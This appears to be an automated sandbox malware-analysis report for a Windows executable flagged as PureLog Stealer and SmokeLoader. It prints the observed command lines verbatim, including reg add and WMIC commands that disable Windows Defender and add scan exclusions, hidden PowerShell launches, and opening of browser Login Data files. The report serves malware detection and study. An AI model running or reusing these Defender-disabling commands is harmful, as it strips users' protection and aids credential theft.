Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8028 -s 356
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147735503 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147814524 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147780199 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\threats\threatiddefaultaction\" /f /v 2147812831 /t reg_sz /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /c powershell start-process -windowstyle hidden gpupdate.exe /force"

Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000024.00000000.1419179675.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000024.00000000.1346017941.0000000004880000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000024.00000000.1321857063.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000024.00000000.1332636125.0000000001441000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E3575270 cpuid

0_2_00007FF7E3575270

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E35D92DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF7E35D92DC

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe

Code function: 18_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,

18_2_00414B04

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry value created: Exclusions_Extensions 1

Modifies Group Policy settings

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

AV process strings found (often used to terminate AV products)

Source: svchost.exe, 00000010.00000002.2551531732.000001C67CF02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Files%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000010.00000002.2551531732.000001C67CF02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 Blob

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Searches for user specific document files

Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\Documents\SimpleAdobe\Dwkvj_9aXUK5SRV0uUMfzWFw.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Windows Analysis Report
lgX7lgUL1w.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Exploits

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

ID:	1447097
Product:	CloudBasic
Start time:	11:28:06
Start date:	24.05.2024
Sample:	lgX7lgUL1w.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	7ff8c26a36f5a4566990745dff1594f3
SHA1:	5d73bbd168fb9b1e43051340a415d95f28c40f4d
SHA256:	fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813
Filetype:	Win64 Executable Console (202006/5) 92.65%

Windows Analysis Report lgX7lgUL1w.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Exploits

Compliance

Change of critical system settings

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
lgX7lgUL1w.exe

Malware Threat Intel
Provided by